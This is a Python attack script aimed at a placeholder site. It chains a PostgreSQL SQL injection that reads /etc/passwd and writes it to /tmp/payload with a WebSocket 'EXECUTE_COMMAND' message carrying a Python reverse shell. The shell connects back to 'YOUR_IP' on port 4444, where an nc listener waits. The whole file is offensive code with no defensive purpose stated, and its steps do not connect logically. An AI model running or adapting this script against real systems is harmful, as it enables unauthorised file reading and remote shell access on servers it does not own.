import websocket
import requests
import time
import threading
import os

# Target settings
TARGET_URL = "http://vulnerable-site.com/vuln-endpoint"
WEBSOCKET_URL = "ws://vulnerable-site.com/socket"
REVERSE_IP = "YOUR_IP"
REVERSE_PORT = 4444

# **1. Perform SQL Injection to create a malicious file on the server**
sql_payload = """SELECT lo_export(
  (SELECT convert_from(pg_read_file('/etc/passwd'), 'UTF8')), 
  '/tmp/payload'
);"""

# Send SQLi to the server
requests.post(TARGET_URL, data={"input": sql_payload}, headers={"Content-Type": "application/x-www-form-urlencoded"})

print("[+] SQL Injection executed, file saved at /tmp/payload.")

# **2. Set up WebSocket and execute RCE**
def on_message(ws, message):
    print("[+] Received message from WebSocket:", message)
    # Execute RCE using WebSocket
    exploit_payload = f"""import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("{REVERSE_IP}",{REVERSE_PORT})); 
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);"""
    
    ws.send(f"EXECUTE_COMMAND:{exploit_payload}")

def on_open(ws):
    print("[+] WebSocket connection established.")
    ws.send("INITIATE_EXPLOIT")

# **3. Perform WebSocket Hijacking**
def start_websocket_exploit():
    ws = websocket.WebSocketApp(WEBSOCKET_URL, on_message=on_message, on_open=on_open)
    ws.run_forever()

# **4. Start listener to receive the shell**
def start_listener():
    print(f"[+] Listening on {REVERSE_PORT}...")
    os.system(f"nc -lvnp {REVERSE_PORT}")

# Start WebSocket Hijack in a separate thread
threading.Thread(target=start_websocket_exploit).start()
time.sleep(2)

# Start Listener to receive Reverse Shell
start_listener()